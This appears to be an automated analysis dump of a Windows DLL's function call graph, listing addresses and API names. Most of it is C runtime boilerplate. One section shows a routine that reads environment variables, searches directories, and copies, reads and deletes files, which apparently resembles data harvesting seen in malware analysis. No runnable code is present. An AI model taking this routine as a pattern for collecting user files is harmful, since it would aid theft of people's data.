1000637b _abort 20 API calls 7258->7259 7260 10007aa7 7259->7260 7261 1000571e _free 20 API calls 7260->7261 7262 10007ab3 7261->7262 7263 1000637b _abort 20 API calls 7262->7263 7266 10007ad9 7262->7266 7265 10007acd 7263->7265 7264 10005eb7 11 API calls 7264->7266 7267 1000571e _free 20 API calls 7265->7267 7266->7264 7268 10007ae5 7266->7268 7267->7266 6082 10007103 GetCommandLineA GetCommandLineW 6083 10005303 6086 100050a5 6083->6086 6095 1000502f 6086->6095 6089 1000502f 5 API calls 6090 100050c3 6089->6090 6099 10005000 6090->6099 6093 10005000 20 API calls 6094 100050d9 6093->6094 6096 10005048 6095->6096 6097 10002ada _ValidateLocalCookies 5 API calls 6096->6097 6098 10005069 6097->6098 6098->6089 6100 1000502a 6099->6100 6101 1000500d 6099->6101 6100->6093 6102 10005024 6101->6102 6103 1000571e _free 20 API calls 6101->6103 6104 1000571e _free 20 API calls 6102->6104 6103->6101 6104->6100 6691 1000af43 6692 1000af59 6691->6692 6693 1000af4d 6691->6693 6693->6692 6694 1000af52 CloseHandle 6693->6694 6694->6692 6695 1000a945 6696 1000a96d 6695->6696 6697 1000a9a5 6696->6697 6698 1000a997 6696->6698 6699 1000a99e 6696->6699 6704 1000aa17 6698->6704 6708 1000aa00 6699->6708 6705 1000aa20 6704->6705 6712 1000b19b 6705->6712 6709 1000aa20 6708->6709 6710 1000b19b __startOneArgErrorHandling 21 API calls 6709->6710 6711 1000a9a3 6710->6711 6713 1000b1da __startOneArgErrorHandling 6712->6713 6715 1000b25c __startOneArgErrorHandling 6713->6715 6722 1000b59e 6713->6722 6720 1000b286 6715->6720 6725 100078a3 6715->6725 6717 1000b292 6719 10002ada _ValidateLocalCookies 5 API calls 6717->6719 6721 1000a99c 6719->6721 6720->6717 6729 1000b8b2 6720->6729 6736 1000b5c1 6722->6736 6726 100078cb 6725->6726 6727 10002ada _ValidateLocalCookies 5 API calls 6726->6727 6728 100078e8 6727->6728 6728->6720 6730 1000b8d4 6729->6730 6731 1000b8bf 6729->6731 6733 10006368 _free 20 API calls 6730->6733 6732 1000b8d9 6731->6732 6734 10006368 _free 20 API calls 6731->6734 6732->6717 6733->6732 6735 1000b8cc 6734->6735 6735->6717 6737 1000b5ec __raise_exc 6736->6737 6738 1000b7e5 RaiseException 6737->6738 6739 1000b5bc 6738->6739 6739->6715 7520 1000a1c6 IsProcessorFeaturePresent 7521 10007bc7 7522 10007bd3 ___DestructExceptionObject 7521->7522 7523 10007c0a _abort 7522->7523 7529 10005671 RtlEnterCriticalSection 7522->7529 7525 10007be7 7526 10007f86 __fassign 20 API calls 7525->7526 7527 10007bf7 7526->7527 7530 10007c10 7527->7530 7529->7525 7533 100056b9 RtlLeaveCriticalSection 7530->7533 7532 10007c17 7532->7523 7533->7532 6740 10005348 6741 10003529 ___vcrt_uninitialize 8 API calls 6740->6741 6742 1000534f 6741->6742 6743 10007b48 6753 10008ebf 6743->6753 6747 10007b55 6766 1000907c 6747->6766 6750 10007b7f 6751 1000571e _free 20 API calls 6750->6751 6752 10007b8a 6751->6752 6770 10008ec8 6753->6770 6755 10007b50 6756 10008fdc 6755->6756 6757 10008fe8 ___DestructExceptionObject 6756->6757 6790 10005671 RtlEnterCriticalSection 6757->6790 6759 1000905e 6804 10009073 6759->6804 6761 10009032 RtlDeleteCriticalSection 6764 1000571e _free 20 API calls 6761->6764 6762 1000906a _abort 6762->6747 6765 10008ff3 6764->6765 6765->6759 6765->6761 6791 1000a09c 6765->6791 6767 10009092 6766->6767 6768 10007b64 RtlDeleteCriticalSection 6766->6768 6767->6768 6769 1000571e _free 20 API calls 6767->6769 6768->6747 6768->6750 6769->6768 6771 10008ed4 ___DestructExceptionObject 6770->6771 6780 10005671 RtlEnterCriticalSection 6771->6780 6773 10008f77 6785 10008f97 6773->6785 6776 10008f83 _abort 6776->6755 6778 10008e78 66 API calls 6779 10008ee3 6778->6779 6779->6773 6779->6778 6781 10007b94 RtlEnterCriticalSection 6779->6781 6782 10008f6d 6779->6782 6780->6779 6781->6779 6788 10007ba8 RtlLeaveCriticalSection 6782->6788 6784 10008f75 6784->6779 6789 100056b9 RtlLeaveCriticalSection 6785->6789 6787 10008f9e 6787->6776 6788->6784 6789->6787 6790->6765 6792 1000a0a8 ___DestructExceptionObject 6791->6792 6793 1000a0b9 6792->6793 6794 1000a0ce 6792->6794 6795 10006368 _free 20 API calls 6793->6795 6803 1000a0c9 _abort 6794->6803 6807 10007b94 RtlEnterCriticalSection 6794->6807 6797 1000a0be 6795->6797 6799 100062ac ___std_exception_copy 26 API calls 6797->6799 6798 1000a0ea 6808 1000a026 6798->6808 6799->6803 6801 1000a0f5 6824 1000a112 6801->6824 6803->6765 7072 100056b9 RtlLeaveCriticalSection 6804->7072 6806 1000907a 6806->6762 6807->6798 6809 1000a033 6808->6809 6810 1000a048 6808->6810 6811 10006368 _free 20 API calls 6809->6811 6816 1000a043 6810->6816 6827 10008e12 6810->6827 6812 1000a038 6811->6812 6814 100062ac ___std_exception_copy 26 API calls 6812->6814 6814->6816 6816->6801 6817 1000907c 20 API calls 6818 1000a064 6817->6818 6833 10007a5a 6818->6833 6820 1000a06a 6840 1000adce 6820->6840 6823 1000571e _free 20 API calls 6823->6816 7071 10007ba8 RtlLeaveCriticalSection 6824->7071 6826 1000a11a 6826->6803 6828 10008e2a 6827->6828 6829 10008e26 6827->6829 6828->6829 6830 10007a5a 26 API calls 6828->6830 6829->6817 6831 10008e4a 6830->6831 6855 10009a22 6831->6855 6834 10007a66 6833->6834 6835 10007a7b 6833->6835 6836 10006368 _free 20 API calls 6834->6836 6835->6820 6837 10007a6b 6836->6837 6838 100062ac ___std_exception_copy 26 API calls 6837->6838 6839 10007a76 6838->6839 6839->6820 6841 1000adf2 6840->6841 6842 1000addd 6840->6842 6843 1000ae2d 6841->6843 6848 1000ae19 6841->6848 6844 10006355 __dosmaperr 20 API calls 6842->6844 6845 10006355 __dosmaperr 20 API calls 6843->6845 6846 1000ade2 6844->6846 6849 1000ae32 6845->6849 6847 10006368 _free 20 API calls 6846->6847 6852 1000a070 6847->6852 7028 1000ada6 6848->7028 6851 10006368 _free 20 API calls 6849->6851 6853 1000ae3a 6851->6853 6852->6816 6852->6823 6854 100062ac ___std_exception_copy 26 API calls 6853->6854 6854->6852 6856 10009a2e ___DestructExceptionObject 6855->6856 6857 10009a36 6856->6857 6858 10009a4e 6856->6858 6880 10006355 6857->6880 6860 10009aec 6858->6860 6864 10009a83 6858->6864 6862 10006355 __dosmaperr 20 API calls 6860->6862 6865 10009af1 6862->6865 6863 10006368 _free 20 API calls 6866 10009a43 _abort 6863->6866 6883 10008c7b RtlEnterCriticalSection 6864->6883 6868 10006368 _free 20 API calls 6865->6868 6866->6829 6870 10009af9 6868->6870 6869 10009a89 6871 10009aa5 6869->6871 6872 10009aba 6869->6872 6873 100062ac ___std_exception_copy 26 API calls 6870->6873 6874 10006368 _free 20 API calls 6871->6874 6884 10009b0d 6872->6884 6873->6866 6876 10009aaa 6874->6876 6878 10006355 __dosmaperr 20 API calls 6876->6878 6877 10009ab5 6935 10009ae4 6877->6935 6878->6877 6881 10005b7a _abort 20 API calls 6880->6881 6882 1000635a 6881->6882 6882->6863 6883->6869 6885 10009b34 6884->6885 6886 10009b3b 6884->6886 6889 10002ada _ValidateLocalCookies 5 API calls 6885->6889 6887 10009b5e 6886->6887 6888 10009b3f 6886->6888 6891 10009baf 6887->6891 6892 10009b92 6887->6892 6890 10006355 __dosmaperr 20 API calls 6888->6890 6893 10009d15 6889->6893 6894 10009b44 6890->6894 6896 10009bc5 6891->6896 6938 1000a00b 6891->6938 6895 10006355 __dosmaperr 20 API calls 6892->6895 6893->6877 6897 10006368 _free 20 API calls 6894->6897 6899 10009b97 6895->6899 6941 100096b2 6896->6941 6901 10009b4b 6897->6901 6904 10006368 _free 20 API calls 6899->6904 6902 100062ac ___std_exception_copy 26 API calls 6901->6902 6902->6885 6907 10009b9f 6904->6907 6905 10009bd3 6908 10009bf9 6905->6908 6913 10009bd7 6905->6913 6906 10009c0c 6910 10009c20 6906->6910 6911 10009c66 WriteFile 6906->6911 6909 100062ac ___std_exception_copy 26 API calls 6907->6909 6953 10009492 GetConsoleCP 6908->6953 6909->6885 6916 10009c56 6910->6916 6917 10009c28 6910->6917 6915 10009c89 GetLastError 6911->6915 6922 10009bef 6911->6922 6912 10009ccd 6912->6885 6924 10006368 _free 20 API calls 6912->6924 6913->6912 6948 10009645 6913->6948 6915->6922 6979 10009728 6916->6979 6918 10009c46 6917->6918 6919 10009c2d 6917->6919 6971 100098f5 6918->6971 6919->6912 6964 10009807 6919->6964 6922->6885 6922->6912 6927 10009ca9 6922->6927 6926 10009cf2 6924->6926 6930 10006355 __dosmaperr 20 API calls 6926->6930 6928 10009cb0 6927->6928 6929 10009cc4 6927->6929 6931 10006368 _free 20 API calls 6928->6931 6986 10006332 6929->6986 6930->6885 6933 10009cb5 6931->6933 6934 10006355 __dosmaperr 20 API calls 6933->6934 6934->6885 7027 10008c9e RtlLeaveCriticalSection 6935->7027 6937 10009aea 6937->6866 6991 10009f8d 6938->6991 7013 10008dbc 6941->7013 6943 100096c2 6944 100096c7 6943->6944 6945 10005af6 _abort 38 API calls 6943->6945 6944->6905 6944->6906 6946 100096ea 6945->6946 6946->6944 6947 10009708 GetConsoleMode 6946->6947 6947->6944 6951 1000966a 6948->6951 6952 1000969f 6948->6952 6949 1000a181 WriteConsoleW CreateFileW 6949->6951 6950 100096a1 GetLastError 6950->6952 6951->6949 6951->6950 6951->6952 6952->6922 6957 100094f5 6953->6957 6963 10009607 6953->6963 6954 10002ada _ValidateLocalCookies 5 API calls 6955 10009641 6954->6955 6955->6922 6958 1000957b WideCharToMultiByte 6957->6958 6960 100079e6 40 API calls __fassign 6957->6960 6962 100095d2 WriteFile 6957->6962 6957->6963 7022 10007c19 6957->7022 6959 100095a1 WriteFile 6958->6959 6958->6963 6959->6957 6961 1000962a GetLastError 6959->6961 6960->6957 6961->6963 6962->6957 6962->6961 6963->6954 6966 10009816 6964->6966 6965 100098d8 6968 10002ada _ValidateLocalCookies 5 API calls 6965->6968 6966->6965 6967 10009894 WriteFile 6966->6967 6967->6966 6969 100098da GetLastError 6967->6969 6970 100098f1 6968->6970 6969->6965 6970->6922 6978 10009904 6971->6978 6972 10009a0f 6973 10002ada _ValidateLocalCookies 5 API calls 6972->6973 6975 10009a1e 6973->6975 6974 10009986 WideCharToMultiByte 6976 10009a07 GetLastError 6974->6976 6977 100099bb WriteFile 6974->6977 6975->6922 6976->6972 6977->6976 6977->6978 6978->6972 6978->6974 6978->6977 6984 10009737 6979->6984 6980 100097ea 6981 10002ada _ValidateLocalCookies 5 API calls 6980->6981 6983 10009803 6981->6983 6982 100097a9 WriteFile 6982->6984 6985 100097ec GetLastError 6982->6985 6983->6922 6984->6980 6984->6982 6985->6980 6987 10006355 __dosmaperr 20 API calls 6986->6987 6988 1000633d _free 6987->6988 6989 10006368 _free 20 API calls 6988->6989 6990 10006350 6989->6990 6990->6885 7000 10008d52 6991->7000 6993 10009f9f 6994 10009fa7 6993->6994 6995 10009fb8 SetFilePointerEx 6993->6995 6996 10006368 _free 20 API calls 6994->6996 6997 10009fd0 GetLastError 6995->6997 6998 10009fac 6995->6998 6996->6998 6999 10006332 __dosmaperr 20 API calls 6997->6999 6998->6896 6999->6998 7001 10008d74 7000->7001 7002 10008d5f 7000->7002 7005 10006355 __dosmaperr 20 API calls 7001->7005 7007 10008d99 7001->7007 7003 10006355 __dosmaperr 20 API calls 7002->7003 7004 10008d64 7003->7004 7006 10006368 _free 20 API calls 7004->7006 7008 10008da4 7005->7008 7009 10008d6c 7006->7009 7007->6993 7010 10006368 _free 20 API calls 7008->7010 7009->6993 7011 10008dac 7010->7011 7012 100062ac ___std_exception_copy 26 API calls 7011->7012 7012->7009 7014 10008dd6 7013->7014 7015 10008dc9 7013->7015 7017 10008de2 7014->7017 7018 10006368 _free 20 API calls 7014->7018 7016 10006368 _free 20 API calls 7015->7016 7019 10008dce 7016->7019 7017->6943 7020 10008e03 7018->7020 7019->6943 7021 100062ac ___std_exception_copy 26 API calls 7020->7021 7021->7019 7023 10005af6 _abort 38 API calls 7022->7023 7024 10007c24 7023->7024 7025 10007a00 __fassign 38 API calls 7024->7025 7026 10007c34 7025->7026 7026->6957 7027->6937 7031 1000ad24 7028->7031 7030 1000adca 7030->6852 7032 1000ad30 ___DestructExceptionObject 7031->7032 7042 10008c7b RtlEnterCriticalSection 7032->7042 7034 1000ad3e 7035 1000ad70 7034->7035 7036 1000ad65 7034->7036 7038 10006368 _free 20 API calls 7035->7038 7043 1000ae4d 7036->7043 7039 1000ad6b 7038->7039 7058 1000ad9a 7039->7058 7041 1000ad8d _abort 7041->7030 7042->7034 7044 10008d52 26 API calls 7043->7044 7046 1000ae5d 7044->7046 7045 1000ae63 7061 10008cc1 7045->7061 7046->7045 7048 1000ae95 7046->7048 7051 10008d52 26 API calls 7046->7051 7048->7045 7049 10008d52 26 API calls 7048->7049 7052 1000aea1 CloseHandle 7049->7052 7054 1000ae8c 7051->7054 7052->7045 7056 1000aead GetLastError 7052->7056 7053 1000aedd 7053->7039 7055 10008d52 26 API calls 7054->7055 7055->7048 7056->7045 7057 10006332 __dosmaperr 20 API calls 7057->7053 7070 10008c9e RtlLeaveCriticalSection 7058->7070 7060 1000ada4 7060->7041 7062 10008cd0 7061->7062 7063 10008d37 7061->7063 7062->7063 7068 10008cfa 7062->7068 7064 10006368 _free 20 API calls 7063->7064 7065 10008d3c 7064->7065 7066 10006355 __dosmaperr 20 API calls 7065->7066 7067 10008d27 7066->7067 7067->7053 7067->7057 7068->7067 7069 10008d21 SetStdHandle 7068->7069 7069->7067 7070->7060 7071->6826 7072->6806 7073 10002049 7074 10002055 ___DestructExceptionObject 7073->7074 7075 100020d3 7074->7075 7076 1000207d 7074->7076 7086 1000205e 7074->7086 7077 10002639 ___scrt_fastfail 4 API calls 7075->7077 7087 1000244c 7076->7087 7079 100020da 7077->7079 7080 10002082 7096 10002308 7080->7096 7082 10002087 __RTC_Initialize 7099 100020c4 7082->7099 7084 1000209f 7102 1000260b 7084->7102 7088 10002451 ___scrt_release_startup_lock 7087->7088 7089 10002461 7088->7089 7090 10002455 7088->7090 7093 1000246e 7089->7093 7094 1000499b _abort 28 API calls 7089->7094 7091 1000527a _abort 20 API calls 7090->7091 7092 1000245f 7091->7092 7092->7080 7093->7080 7095 10004bbd 7094->7095 7095->7080 7108 100034c7 RtlInterlockedFlushSList 7096->7108 7098 10002312 7098->7082 7110 1000246f 7099->7110 7101 100020c9 ___scrt_release_startup_lock 7101->7084 7103 10002617 7102->7103 7104 1000262d 7103->7104 7129 100053ed 7103->7129 7104->7086 7107 10003529 ___vcrt_uninitialize 8 API calls 7107->7104 7109 100034d7 7108->7109 7109->7098 7115 100053ff 7110->7115 7113 1000391b ___vcrt_uninitialize_ptd 6 API calls 7114 1000354d 7113->7114 7114->7101 7118 10005c2b 7115->7118 7119 10005c35 7118->7119 7121 10002476 7118->7121 7122 10005db2 7119->7122 7121->7113 7123 10005c45 _abort 5 API calls 7122->7123 7124 10005dd9 7123->7124 7125 10005df1 TlsFree 7124->7125 7126 10005de5 7124->7126 7125->7126 7127 10002ada _ValidateLocalCookies 5 API calls 7126->7127 7128 10005e02 7127->7128 7128->7121 7132 100074da 7129->7132 7135 100074f3 7132->7135 7133 10002ada _ValidateLocalCookies 5 API calls 7134 10002625 7133->7134 7134->7107 7135->7133 7269 10008a89 7272 10006d60 7269->7272 7273 10006d69 7272->7273 7274 10006d72 7272->7274 7276 10006c5f 7273->7276 7277 10005af6 _abort 38 API calls 7276->7277 7278 10006c6c 7277->7278 7279 10006d7e __fassign 38 API calls 7278->7279 7280 10006c74 7279->7280 7296 100069f3 7280->7296 7283 10006c8b 7283->7274 7286 10006cce 7289 1000571e _free 20 API calls 7286->7289 7289->7283 7290 10006cc9 7291 10006368 _free 20 API calls 7290->7291 7291->7286 7292 10006d12 7292->7286 7320 100068c9 7292->7320 7293 10006ce6 7293->7292 7294 1000571e _free 20 API calls 7293->7294 7294->7292 7297 100054a7 __fassign 38 API calls 7296->7297 7298 10006a05 7297->7298 7299 10006a14 GetOEMCP 7298->7299 7300 10006a26 7298->7300 7302 10006a3d 7299->7302 7301 10006a2b GetACP 7300->7301 7300->7302 7301->7302 7302->7283 7303 100056d0 7302->7303 7304 1000570e 7303->7304 7308 100056de _abort 7303->7308 7305 10006368 _free 20 API calls 7304->7305 7307 1000570c 7305->7307 7306 100056f9 RtlAllocateHeap 7306->7307 7306->7308 7307->7286 7310 10006e20 7307->7310 7308->7304 7308->7306 7309 1000474f _abort 7 API calls 7308->7309 7309->7308 7311 100069f3 40 API calls 7310->7311 7312 10006e3f 7311->7312 7315 10006e90 IsValidCodePage 7312->7315 7317 10006e46 7312->7317 7319 10006eb5 ___scrt_fastfail 7312->7319 7313 10002ada _ValidateLocalCookies 5 API calls 7314 10006cc1 7313->7314 7314->7290 7314->7293 7316 10006ea2 GetCPInfo 7315->7316 7315->7317 7316->7317 7316->7319 7317->7313 7323 10006acb GetCPInfo 7319->7323 7396 10006886 7320->7396 7322 100068ed 7322->7286 7324 10006baf 7323->7324 7330 10006b05 7323->7330 7327 10002ada _ValidateLocalCookies 5 API calls 7324->7327 7329 10006c5b 7327->7329 7329->7317 7333 100086e4 7330->7333 7332 10008a3e 43 API calls 7332->7324 7334 100054a7 __fassign 38 API calls 7333->7334 7336 10008704 MultiByteToWideChar 7334->7336 7337 10008742 7336->7337 7338 100087da 7336->7338 7340 100056d0 21 API calls 7337->7340 7343 10008763 ___scrt_fastfail 7337->7343 7339 10002ada _ValidateLocalCookies 5 API calls 7338->7339 7341 10006b66 7339->7341 7340->7343 7347 10008a3e 7341->7347 7342 100087d4 7352 10008801 7342->7352 7343->7342 7345 100087a8 MultiByteToWideChar 7343->7345 7345->7342 7346 100087c4 GetStringTypeW 7345->7346 7346->7342 7348 100054a7 __fassign 38 API calls 7347->7348 7349 10008a51 7348->7349 7356 10008821 7349->7356 7353 1000880d 7352->7353 7354 1000881e 7352->7354 7353->7354 7355 1000571e _free 20 API calls 7353->7355 7354->7338 7355->7354 7358 1000883c 7356->7358 7357 10008862 MultiByteToWideChar 7359 1000888c 7357->7359 7370 10008a16 7357->7370 7358->7357 7364 100056d0 21 API calls 7359->7364 7366 100088ad 7359->7366 7360 10002ada _ValidateLocalCookies 5 API calls 7361 10006b87 7360->7361 7361->7332 7362 100088f6 MultiByteToWideChar 7363 10008962 7362->7363 7365 1000890f 7362->7365 7368 10008801 __freea 20 API calls 7363->7368 7364->7366 7383 10005f19 7365->7383 7366->7362 7366->7363 7368->7370 7370->7360 7371 10008971 7373 100056d0 21 API calls 7371->7373 7376 10008992 7371->7376 7372 10008939 7372->7363 7374 10005f19 11 API calls 7372->7374 7373->7376 7374->7363 7375 10008a07 7378 10008801 __freea 20 API calls 7375->7378 7376->7375 7377 10005f19 11 API calls 7376->7377 7379 100089e6 7377->7379 7378->7363 7379->7375 7380 100089f5 WideCharToMultiByte 7379->7380 7380->7375 7381 10008a35 7380->7381 7382 10008801 __freea 20 API calls 7381->7382 7382->7363 7384 10005c45 _abort 5 API calls 7383->7384 7385 10005f40 7384->7385 7388 10005f49 7385->7388 7391 10005fa1 7385->7391 7389 10002ada _ValidateLocalCookies 5 API calls 7388->7389 7390 10005f9b 7389->7390 7390->7363 7390->7371 7390->7372 7392 10005c45 _abort 5 API calls 7391->7392 7393 10005fc8 7392->7393 7394 10002ada _ValidateLocalCookies 5 API calls 7393->7394 7395 10005f89 LCMapStringW 7394->7395 7395->7388 7397 10006892 ___DestructExceptionObject 7396->7397 7404 10005671 RtlEnterCriticalSection 7397->7404 7399 1000689c 7405 100068f1 7399->7405 7403 100068b5 _abort 7403->7322 7404->7399 7417 10007011 7405->7417 7407 1000693f 7408 10007011 26 API calls 7407->7408 7409 1000695b 7408->7409 7410 10007011 26 API calls 7409->7410 7411 10006979 7410->7411 7412 100068a9 7411->7412 7413 1000571e _free 20 API calls 7411->7413 7414 100068bd 7412->7414 7413->7412 7431 100056b9 RtlLeaveCriticalSection 7414->7431 7416 100068c7 7416->7403 7418 10007022 7417->7418 7427 1000701e 7417->7427 7419 10007029 7418->7419 7423 1000703c ___scrt_fastfail 7418->7423 7420 10006368 _free 20 API calls 7419->7420 7421 1000702e 7420->7421 7422 100062ac ___std_exception_copy 26 API calls 7421->7422 7422->7427 7424 10007073 7423->7424 7425 1000706a 7423->7425 7423->7427 7424->7427 7429 10006368 _free 20 API calls 7424->7429 7426 10006368 _free 20 API calls 7425->7426 7428 1000706f 7426->7428 7427->7407 7430 100062ac ___std_exception_copy 26 API calls 7428->7430 7429->7428 7430->7427 7431->7416 6105 1000220c 6106 10002215 6105->6106 6107 1000221a dllmain_dispatch 6105->6107 6109 100022b1 6106->6109 6110 100022c7 6109->6110 6112 100022d0 6110->6112 6113 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6110->6113 6112->6107 6113->6112 7136 1000724e GetProcessHeap 7137 1000284f 7138 10002882 std::exception::exception 27 API calls 7137->7138 7139 1000285d 7138->7139 7436 10003c90 RtlUnwind 7534 100036d0 7535 100036e2 7534->7535 7537 100036f0 @_EH4_CallFilterFunc@8 7534->7537 7536 10002ada _ValidateLocalCookies 5 API calls 7535->7536 7536->7537 7140 10005351 7141 10005360 7140->7141 7142 10005374 7140->7142 7141->7142 7145 1000571e _free 20 API calls 7141->7145 7143 1000571e _free 20 API calls 7142->7143 7144 10005386 7143->7144 7146 1000571e _free 20 API calls 7144->7146 7145->7142 7147 10005399 7146->7147 7148 1000571e _free 20 API calls 7147->7148 7149 100053aa 7148->7149 7150 1000571e _free 20 API calls 7149->7150 7151 100053bb 7150->7151 7538 100073d5 7539 100073e1 ___DestructExceptionObject 7538->7539 7550 10005671 RtlEnterCriticalSection 7539->7550 7541 100073e8 7542 10008be3 27 API calls 7541->7542 7543 100073f7 7542->7543 7548 10007406 7543->7548 7551 10007269 GetStartupInfoW 7543->7551 7562 10007422 7548->7562 7549 10007417 _abort 7550->7541 7552 10007286 7551->7552 7553 10007318 7551->7553 7552->7553 7554 10008be3 27 API calls 7552->7554 7557 1000731f 7553->7557 7555 100072af 7554->7555 7555->7553 7556 100072dd GetFileType 7555->7556 7556->7555 7559 10007326 7557->7559 7558 10007369 GetStdHandle 7558->7559 7559->7558 7560 100073d1 7559->7560 7561 1000737c GetFileType 7559->7561 7560->7548 7561->7559 7565 100056b9 RtlLeaveCriticalSection 7562->7565 7564 10007429 7564->7549 7565->7564 7566 10004ed7 7567 10006d60 51 API calls 7566->7567 7568 10004ee9 7567->7568 7577 10007153 GetEnvironmentStringsW 7568->7577 7571 10004ef4 7573 1000571e _free 20 API calls 7571->7573 7574 10004f29 7573->7574 7575 10004eff 7576 1000571e _free 20 API calls 7575->7576 7576->7571 7578 1000716a 7577->7578 7588 100071bd 7577->7588 7579 10007170 WideCharToMultiByte 7578->7579 7582 1000718c 7579->7582 7579->7588 7580 100071c6 FreeEnvironmentStringsW 7581 10004eee 7580->7581 7581->7571 7589 10004f2f 7581->7589 7583 100056d0 21 API calls 7582->7583 7584 10007192 7583->7584 7585 100071af 7584->7585 7586 10007199 WideCharToMultiByte 7584->7586 7587 1000571e _free 20 API calls 7585->7587 7586->7585 7587->7588 7588->7580 7588->7581 7590 10004f44 7589->7590 7591 1000637b _abort 20 API calls 7590->7591 7593 10004f6b 7591->7593 7592 1000571e _free 20 API calls 7595 10004fe9 7592->7595 7594 10004fcf 7593->7594 7596 1000637b _abort 20 API calls 7593->7596 7597 10004fd1 7593->7597 7598 1000544d ___std_exception_copy 26 API calls 7593->7598 7601 10004ff3 7593->7601 7604 1000571e _free 20 API calls 7593->7604 7594->7592 7595->7575 7596->7593 7599 10005000 20 API calls 7597->7599 7598->7593 7600 10004fd7 7599->7600 7602 1000571e _free 20 API calls 7600->7602 7603 100062bc ___std_exception_copy 11 API calls 7601->7603 7602->7594 7605 10004fff 7603->7605 7604->7593 6114 10002418 6115 10002420 ___scrt_release_startup_lock 6114->6115 6118 100047f5 6115->6118 6117 10002448 6119 10004804 6118->6119 6120 10004808 6118->6120 6119->6117 6123 10004815 6120->6123 6124 10005b7a _abort 20 API calls 6123->6124 6127 1000482c 6124->6127 6125 10002ada _ValidateLocalCookies 5 API calls 6126 10004811 6125->6126 6126->6117 6127->6125 7437 10004a9a 7440 10005411 7437->7440 7441 1000541d _abort 7440->7441 7442 10005af6 _abort 38 API calls 7441->7442 7445 10005422 7442->7445 7443 100055a8 _abort 38 API calls 7444 1000544c 7443->7444 7445->7443 5856 10001c5b 5857 10001c6b ___scrt_fastfail 5856->5857 5860 100012ee 5857->5860 5859 10001c87 5861 10001324 ___scrt_fastfail 5860->5861 5862 100013b7 GetEnvironmentVariableW 5861->5862 5886 100010f1 5862->5886 5865 100010f1 57 API calls 5866 10001465 5865->5866 5867 100010f1 57 API calls 5866->5867 5868 10001479 5867->5868 5869 100010f1 57 API calls 5868->5869 5870 1000148d 5869->5870 5871 100010f1 57 API calls 5870->5871 5872 100014a1 5871->5872 5873 100010f1 57 API calls 5872->5873 5874 100014b5 lstrlenW 5873->5874 5875 100014d2 5874->5875 5876 100014d9 lstrlenW 5874->5876 5875->5859 5877 100010f1 57 API calls 5876->5877 5878 10001501 lstrlenW lstrcatW 5877->5878 5879 100010f1 57 API calls 5878->5879 5880 10001539 lstrlenW lstrcatW 5879->5880 5881 100010f1 57 API calls 5880->5881 5882 1000156b lstrlenW lstrcatW 5881->5882 5883 100010f1 57 API calls 5882->5883 5884 1000159d lstrlenW lstrcatW 5883->5884 5885 100010f1 57 API calls 5884->5885 5885->5875 5887 10001118 ___scrt_fastfail 5886->5887 5888 10001129 lstrlenW 5887->5888 5899 10002c40 5888->5899 5890 10001148 lstrcatW lstrlenW 5891 10001177 lstrlenW FindFirstFileW 5890->5891 5892 10001168 lstrlenW 5890->5892 5893 100011a0 5891->5893 5894 100011e1 5891->5894 5892->5891 5895 100011c7 FindNextFileW 5893->5895 5898 100011aa 5893->5898 5894->5865 5895->5893 5896 100011da FindClose 5895->5896 5896->5894 5898->5895 5901 10001000 5898->5901 5900 10002c57 5899->5900 5900->5890 5900->5900 5902 10001022 ___scrt_fastfail 5901->5902 5903 100010af 5902->5903 5904 1000102f lstrcatW lstrlenW 5902->5904 5905 100010b5 lstrlenW 5903->5905 5906 100010ad 5903->5906 5907 1000105a lstrlenW 5904->5907 5908 1000106b lstrlenW 5904->5908 5932 10001e16 5905->5932 5906->5898 5907->5908 5918 10001e89 lstrlenW 5908->5918 5911 10001088 GetFileAttributesW 5911->5906 5913 1000109c 5911->5913 5912 100010ca 5912->5906 5914 10001e89 5 API calls 5912->5914 5913->5906 5924 1000173a 5913->5924 5916 100010df 5914->5916 5937 100011ea 5916->5937 5919 10002c40 ___scrt_fastfail 5918->5919 5920 10001ea7 lstrcatW lstrlenW 5919->5920 5921 10001ed1 lstrcatW 5920->5921 5922 10001ec2 5920->5922 5921->5911 5922->5921 5923 10001ec7 lstrlenW 5922->5923 5923->5921 5925 10001747 ___scrt_fastfail 5924->5925 5952 10001cca 5925->5952 5929 1000199f 5929->5906 5930 10001824 ___scrt_fastfail _strlen 5930->5929 5972 100015da 5930->5972 5933 10001e29 5932->5933 5936 10001e4c 5932->5936 5934 10001e2d lstrlenW 5933->5934 5933->5936 5935 10001e3f lstrlenW 5934->5935 5934->5936 5935->5936 5936->5912 5938 1000120e ___scrt_fastfail 5937->5938 5939 10001e89 5 API calls 5938->5939 5940 10001220 GetFileAttributesW 5939->5940 5941 10001235 5940->5941 5942 10001246 5940->5942 5941->5942 5944 1000173a 35 API calls 5941->5944 5943 10001e89 5 API calls 5942->5943 5945 10001258 5943->5945 5944->5942 5946 100010f1 56 API calls 5945->5946 5947 1000126d 5946->5947 5948 10001e89 5 API calls 5947->5948 5949 1000127f ___scrt_fastfail 5948->5949 5950 100010f1 56 API calls 5949->5950 5951 100012e6 5950->5951 5951->5906 5953 10001cf1 ___scrt_fastfail 5952->5953 5954 10001d0f CopyFileW CreateFileW 5953->5954 5955 10001d44 DeleteFileW 5954->5955 5956 10001d55 GetFileSize 5954->5956 5961 10001808 5955->5961 5957 10001ede 22 API calls 5956->5957 5958 10001d66 ReadFile 5957->5958 5959 10001d94 CloseHandle DeleteFileW 5958->5959 5960 10001d7d CloseHandle DeleteFileW 5958->5960 5959->5961 5960->5961 5961->5929 5962 10001ede 5961->5962 5964 1000222f 5962->5964 5965 1000224e 5964->5965 5968 10002250 5964->5968 5980 1000474f 5964->5980 5985 100047e5 5964->5985 5965->5930 5967 10002908 5969 100035d2 __CxxThrowException@8 RaiseException 5967->5969 5968->5967 5992 100035d2 5968->5992 5970 10002925 5969->5970 5970->5930 5973 1000160c _strcat _strlen 5972->5973 5974 1000163c lstrlenW 5973->5974 6080 10001c9d 5974->6080 5976 10001655 lstrcatW lstrlenW 5977 10001678 5976->5977 5978 10001693 ___scrt_fastfail 5977->5978 5979 1000167e lstrcatW 5977->5979 5978->5930 5979->5978 5995 10004793 5980->5995 5982 10004765 6001 10002ada 5982->6001 5984 1000478f 5984->5964 5990 100056d0 _abort 5985->5990 5986 1000570e 6014 10006368 5986->6014 5988 100056f9 RtlAllocateHeap 5989 1000570c 5988->5989 5988->5990 5989->5964 5990->5986 5990->5988 5991 1000474f _abort 7 API calls 5990->5991 5991->5990 5994 100035f2 RaiseException 5992->5994 5994->5967 5996 1000479f ___DestructExceptionObject 5995->5996 6008 10005671 RtlEnterCriticalSection 5996->6008 5998 100047aa 6009 